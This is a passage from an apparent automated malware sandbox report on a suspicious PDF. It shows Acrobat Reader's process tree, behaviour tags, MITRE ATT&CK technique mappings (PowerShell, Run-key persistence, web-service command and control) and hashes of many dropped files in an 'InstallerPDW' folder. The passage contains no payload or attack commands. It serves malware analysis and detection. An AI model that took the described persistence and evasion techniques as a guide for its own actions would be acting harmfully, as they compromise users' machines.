  - - C:\Windows\SysWOW64\explorer.exe
      explorer C:\Users\Admin\AppData\Local\Temp\0e58a5550d9ef809508f7b20ad802f2b.pdf
      4⤵
      System Location Discovery: System Language Discovery
      PID:1288

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:3332
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\0e58a5550d9ef809508f7b20ad802f2b.pdf"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:1336
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    - System Location Discovery: System Language Discovery
    PID:912
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4EE688E235AC8F138C0204F099AFD0F6 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:4300
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=DD47AE7F6A97798668302640F90AD693 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=DD47AE7F6A97798668302640F90AD693 --renderer-client-id=2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1
      4⤵
      System Location Discovery: System Language Discovery
      PID:220
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=712647CD1C93C35264ECFF1E4174BFE1 --mojo-platform-channel-handle=2340 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:3356
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0BF2811DA29824B2B61196B77E7E8C92 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0BF2811DA29824B2B61196B77E7E8C92 --renderer-client-id=5 --mojo-platform-channel-handle=1992 --allow-no-sandbox-job /prefetch:1
      4⤵
      System Location Discovery: System Language Discovery
      PID:3092
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5BEFC56AD0A9B409506C6FDF9B2C90E2 --mojo-platform-channel-handle=2764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:4740
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AF9D0A4FD79CABE186088E9BDB3B44B9 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:3196

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
5d8fe5632c9254faaffa00f842a4c4cc

SHA1
461cd923dddf0e5ea639d6af48cef43b56878730

SHA256
80bb553c1ecf11cbd4dcc5ee7f73361d3862e04f3f462a8f073cde420f48d9ae

SHA512
430183c4667044a8f42b600e6f582489244452760785e44683855c7e6c86d26cbdb780d94ee36f8bf6200a0ccaf46d55eddc2b2f9031c89220630534d88f0633

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aozmvjqy.urj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

Filesize
136KB

MD5
5ecd826babbebdd959456c471dec6465

SHA1
f94a596b742c0653ff7201469f133108f17b46e9

SHA256
b2be43c010bc0d268a42a11296829e088d7eef81cc39bfcdc0b9f0e9a65717ea

SHA512
30563a15786f245e4a7ff1b8996f302dbf4b1d4950098d6899815b5065d3058b290a81b6564c19c85cfcd425c08c9f6bac5bc31ba95773978f9a9c5cde123d38

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\COPYRIGHT

Filesize
3KB

MD5
fc605d978e7825595d752df2ef03f8af

SHA1
c493c9541caaee4bfe3b3e48913fd9df7809299f

SHA256
7d697eaa9acf50fe0b57639b3c62ff02916da184f191944f49eca93d0bb3374f

SHA512
fb811de6a2b36b28ca904224ea3525124bd4628ca9618c70eb9234ab231a09c1b1f28d9b6301581a4fa2e20f1036d5e1c3d6f1bf316c7fe78ef6edeae50ea40e

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\LICENSE

Filesize
41B

MD5
67cb88f6234b6a1f2320a23b197fa3f6

SHA1
877aceba17b28cfff3f5df664e03b319f23767a1

SHA256
263e21f4b43c118a8b4c07f1a8acb11cafc232886834433e34187f5663242360

SHA512
4d43e5edecab92cebd853204c941327dccbfd071a71f066c12f7fb2f1b2def59c37a15ce05c4fe06ec2ea296b8630c4e938254a8a92e149e4a0a82c4307d648f

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\README.txt

Filesize
47B

MD5
4bda1f1b04053dcfe66e87a77b307bb1

SHA1
b8b35584be24be3a8e1160f97b97b2226b38fa7d

SHA256
fd475b1619675b9fb3f5cd11d448b97eddee8d1f6ddcca13ded8bc6e0caa9cf3

SHA512
997cee676018076e9e4e94d61ec94d5b69b148b3152a0148e70d0be959533a13ad0bc1e8b43268f91db08b881bf5050a6d5c157d456597260a2b332a48068980

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt

Filesize
109KB

MD5
0e05bd8b9bfcf17f142445d1f8c6561c

SHA1
cf0a9f4040603008891aa0731abf89ce2403f2fb

SHA256
c3ea3996241b8e9ae7db3780e470174076fd2003d8aefaa77bf0bab5e04de050

SHA512
07c7865d31d22ba0c68e384afedc22261f7b3a82bebc9324145ff7f631623eca2dc31c71cdbbfc9febc1733451a095302de2a0877821a5b68038e350969bf460

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\THIRDPARTYLICENSEREADME.txt

Filesize
176KB

MD5
0e87879f452892b85c81071a1ddd5a2a

SHA1
2cf97c1a84374a6fbbd5d97fe1b432fa799c3b19

SHA256
9c18836fd0b5e4b0c57cffdb74574fa5549085c3b327703dc8efe4208f4e3321

SHA512
10ba68ffd9deab10a0b200707c3af9e95e27aed004f66f049d41310cb041b7618ee017219c848912d5951599208d385bcb928dd33175652101c7e5bc2e3eba5b

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\Welcome.html

Filesize
983B

MD5
3cb773cb396842a7a43ad4868a23abe5

SHA1
ace737f039535c817d867281190ca12f8b4d4b75

SHA256
f450aee7e8fe14512d5a4b445aa5973e202f9ed1e122a8843e4dc2d4421015f0

SHA512
6058103b7446b61613071c639581f51718c12a9e7b6abd3cf3047a3093c2e54b2d9674faf9443570a3bb141f839e03067301ff35422eb9097bd08020e0dd08a4

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\asm-all.jar

Filesize
241KB

MD5
f5ad16c7f0338b541978b0430d51dc83

SHA1
2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a

SHA256
7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d

SHA512
82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\awt.dll

Filesize
1.1MB

MD5
159ccf1200c422ced5407fed35f7e37d

SHA1
177a216b71c9902e254c0a9908fcb46e8d5801a9

SHA256
30eb581c99c8bcbc54012aa5e6084b6ef4fcee5d9968e9cc51f5734449e1ff49

SHA512
ab3f4e3851313391b5b8055e4d526963c38c4403fa74fb70750cc6a2d5108e63a0e600978fa14a7201c48e1afd718a1c6823d091c90d77b17562b7a4c8c40365

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\client\jvm.dll

Filesize
3.7MB

MD5
39c302fe0781e5af6d007e55f509606a

SHA1
23690a52e8c6578de6a7980bb78aae69d0f31780

SHA256
b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc

SHA512
67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\glass.dll

Filesize
196KB

MD5
434cbb561d7f326bbeffa2271ecc1446

SHA1
3d9639f6da2bc8ac5a536c150474b659d0177207

SHA256
1edd9022c10c27bbba2ad843310458edaead37a9767c6fc8fddaaf1adfcbc143

SHA512
9e37b985ecf0b2fef262f183c1cd26d437c8c7be97aa4ec4cd8c75c044336cc69a56a4614ea6d33dc252fe0da8e1bbadc193ff61b87be5dce6610525f321b6dc

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\java.dll

Filesize
123KB

MD5
73bd0b62b158c5a8d0ce92064600620d

SHA1
63c74250c17f75fe6356b649c484ad5936c3e871

SHA256
e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30

SHA512
eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javafx_font.dll

Filesize
56KB

MD5
aeada06201bb8f5416d5f934aaa29c87

SHA1
35bb59febe946fb869e5da6500ab3c32985d3930

SHA256
f8f0b1e283fd94bd87abca162e41afb36da219386b87b0f6a7e880e99073bda3

SHA512
89bad9d1115d030b98e49469275872fff52d8e394fe3f240282696cf31bccf0b87ff5a0e9a697a05befcfe9b24772d65ed73c5dbd168eed111700caad5808a78

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe

Filesize
187KB

MD5
48c96771106dbdd5d42bba3772e4b414

SHA1
e84749b99eb491e40a62ed2e92e4d7a790d09273

SHA256
a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22

SHA512
9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcp120.dll

Filesize
444KB

MD5
fd5cabbe52272bd76007b68186ebaf00

SHA1
efd1e306c1092c17f6944cc6bf9a1bfad4d14613

SHA256
87c42ca155473e4e71857d03497c8cbc28fa8ff7f2c8d72e8a1f39b71078f608

SHA512
1563c8257d85274267089cd4aeac0884a2a300ff17f84bdb64d567300543aa9cd57101d8408d0077b01a600ddf2e804f7890902c2590af103d2c53ff03d9e4a5

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr100.dll

Filesize
755KB

MD5
bf38660a9125935658cfa3e53fdc7d65

SHA1
0b51fb415ec89848f339f8989d323bea722bfd70

SHA256
60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa

SHA512
25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr120.dll

Filesize
948KB

MD5
034ccadc1c073e4216e9466b720f9849

SHA1
f19e9d8317161edc7d3e963cc0fc46bd5e4a55a1

SHA256
86e39b5995af0e042fcdaa85fe2aefd7c9ddc7ad65e6327bd5e7058bc3ab615f

SHA512
5f11ef92d936669ee834a5cef5c7d0e7703bf05d03dc4f09b9dcfe048d7d5adfaab6a9c7f42e8080a5e9aad44a35f39f3940d5cca20623d9cafe373c635570f7

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\net.dll

Filesize
78KB

MD5
691b937a898271ee2cffab20518b310b

SHA1
abedfcd32c3022326bc593ab392dea433fcf667c

SHA256
2f5f1199d277850a009458edb5202688c26dd993f68fe86ca1b946dc74a36d61

SHA512
1c09f4e35a75b336170f64b5c7254a51461dc1997b5862b62208063c6cf84a7cb2d66a67e947cbbf27e1cf34ccd68ba4e91c71c236104070ef3beb85570213ec

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\nio.dll

Filesize
50KB

MD5
95edb3cb2e2333c146a4dd489ce67cbd

SHA1
79013586a6e65e2e1f80e5caf9e2aa15b7363f9a

SHA256
96cf590bddfd90086476e012d9f48a9a696efc054852ef626b43d6d62e72af31

SHA512
ab671f1bce915d748ee49518cc2a666a2715b329cab4ab8f6b9a975c99c146bb095f7a4284cd2aaf4a5b4fcf4f939f54853af3b3acc4205f89ed2ba8a33bb553

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\prism_d3d.dll

Filesize
113KB

MD5
5aadadf700c7771f208dda7ce60de120

SHA1
e9cf7e7d1790dc63a58106c416944fd6717363a5

SHA256
89dac9792c884b70055566564aa12a8626c3aa127a89303730e66aba3c045f79

SHA512
624431a908c2a835f980391a869623ee1fa1f5a1a41f3ee08040e6395b8c11734f76fe401c4b9415f2055e46f60a7f9f2ac0a674604e5743ab8301dbadf279f2

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\verify.dll

Filesize
38KB

MD5
de2167a880207bbf7464bcd1f8bc8657

SHA1
0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7

SHA256
fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3

SHA512
bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\zip.dll

Filesize
68KB

MD5
cb99b83bbc19cd0e1c2ec6031d0a80bc

SHA1
927e1e24fd19f9ca8b5191ef3cc746b74ab68bcd

SHA256
68148243e3a03a3a1aaf4637f054993cb174c04f6bd77894fe84d74af5833bec

SHA512
29c4978fa56f15025355ce26a52bdf8197b8d8073a441425df3dfc93c7d80d36755cc05b6485dd2e1f168df2941315f883960b81368e742c4ea8e69dd82fa2ba

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\dn-compiled-module.jar

Filesize
793KB

MD5
c7f4b29600c2353f7599dd4da851dae4

SHA1
cfd3a61067e1982a56e1c5c77e53bbd523ad1dcc

SHA256
95371359a009dd7102e05aa36bc395c391772fc6066e95b46cbceadff1b6a58d

SHA512
e51bd0c5ffd5db1746b2d928f4610b7bd186a392652b5cac06200c226c69516933491e8dcb171e27be53fb9b7c5a28b8cd8f0c7bd6d1aaac3211bd5ba2fdaf06

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\dn-php-sdk.jar

Filesize
12KB

MD5
3e5e8cccff7ff343cbfe22588e569256

SHA1
66756daa182672bff27e453eed585325d8cc2a7a

SHA256
0f26584763ef1c5ec07d1f310f0b6504bc17732f04e37f4eb101338803be0dc4

SHA512
8ea5f31e25c3c48ee21c51abe9146ee2a270d603788ec47176c16acac15dad608eef4fa8ca0f34a1bbc6475c29e348bd62b0328e73d2e1071aaa745818867522

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\gson.jar

Filesize
226KB

MD5
5134a2350f58890ffb9db0b40047195d

SHA1
751f548c85fa49f330cecbb1875893f971b33c4e

SHA256
2d43eb5ea9e133d2ee2405cc14f5ee08951b8361302fdd93494a3a997b508d32

SHA512
c3cdaf66a99e6336abc80ff23374f6b62ac95ab2ae874c9075805e91d849b18e3f620cc202b4978fc92b73d98de96089c8714b1dd096b2ae1958cfa085715f7a

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-app-framework.jar

Filesize
103KB

MD5
0c8768cdeb3e894798f80465e0219c05

SHA1
c4da07ac93e4e547748ecc26b633d3db5b81ce47

SHA256
15f36830124fc7389e312cf228b952024a8ce8601bf5c4df806bc395d47db669

SHA512
35db507a3918093b529547e991ab6c1643a96258fc95ba1ea7665ff762b0b8abb1ef732b3854663a947effe505be667bd2609ffcccb6409a66df605f971da106

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-core.jar

Filesize
464KB

MD5
7e5e3d6d352025bd7f093c2d7f9b21ab

SHA1
ad9bfc2c3d70c574d34a752c5d0ebcc43a046c57

SHA256
5b37e8ff2850a4cbb02f9f02391e9f07285b4e0667f7e4b2d4515b78e699735a

SHA512
c19c29f8ad8b6beb3eed40ab7dc343468a4ca75d49f1d0d4ea0b4a5cee33f745893fba764d35c8bd157f7842268e0716b1eb4b8b26dcf888fb3b3f4314844aad

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-desktop-ext.jar

Filesize
16KB

MD5
b50e2c75f5f0e1094e997de8a2a2d0ca

SHA1
d789eb689c091536ea6a01764bada387841264cb

SHA256
cf4068ebb5ecd47adec92afba943aea4eb2fee40871330d064b69770cccb9e23

SHA512
57d8ac613805edada6aeba7b55417fd7d41c93913c56c4c2c1a8e8a28bbb7a05aade6e02b70a798a078dc3c747967da242c6922b342209874f3caf7312670cb0

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-gui-ext.jar

Filesize
688KB

MD5
6696368a09c7f8fed4ea92c4e5238cee

SHA1
f89c282e557d1207afd7158b82721c3d425736a7

SHA256
c25d7a7b8f0715729bccb817e345f0fdd668dd4799c8dab1a4db3d6a37e7e3e4

SHA512
0ab24f07f956e3cdcd9d09c3aa4677ff60b70d7a48e7179a02e4ff9c0d2c7a1fc51624c3c8a5d892644e9f36f84f7aaf4aa6d2c9e1c291c88b3cff7568d54f76

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-json-ext.jar

Filesize
16KB

MD5
fde38932b12fc063451af6613d4470cc

SHA1
bc08c114681a3afc05fb8c0470776c3eae2eefeb

SHA256
9967ea3c3d1aee8db5a723f714fba38d2fc26d8553435ab0e1d4e123cd211830

SHA512
0f211f81101ced5fff466f2aab0e6c807bb18b23bc4928fe664c60653c99fa81b34edf5835fcc3affb34b0df1fa61c73a621df41355e4d82131f94fcc0b0e839

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-runtime.jar

Filesize
1.1MB

MD5
d5ef47c915bef65a63d364f5cf7cd467

SHA1
f711f3846e144dddbfb31597c0c165ba8adf8d6b

SHA256
9c287472408857301594f8f7bda108457f6fdae6e25c87ec88dbf3012e5a98b6

SHA512
04aeb956bfcd3bd23b540f9ad2d4110bb2ffd25fe899152c4b2e782daa23a676df9507078ecf1bfc409ddfbe2858ab4c4c324f431e45d8234e13905eb192bae8

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-xml-ext.jar

Filesize
19KB

MD5
0a79304556a1289aa9e6213f574f3b08

SHA1
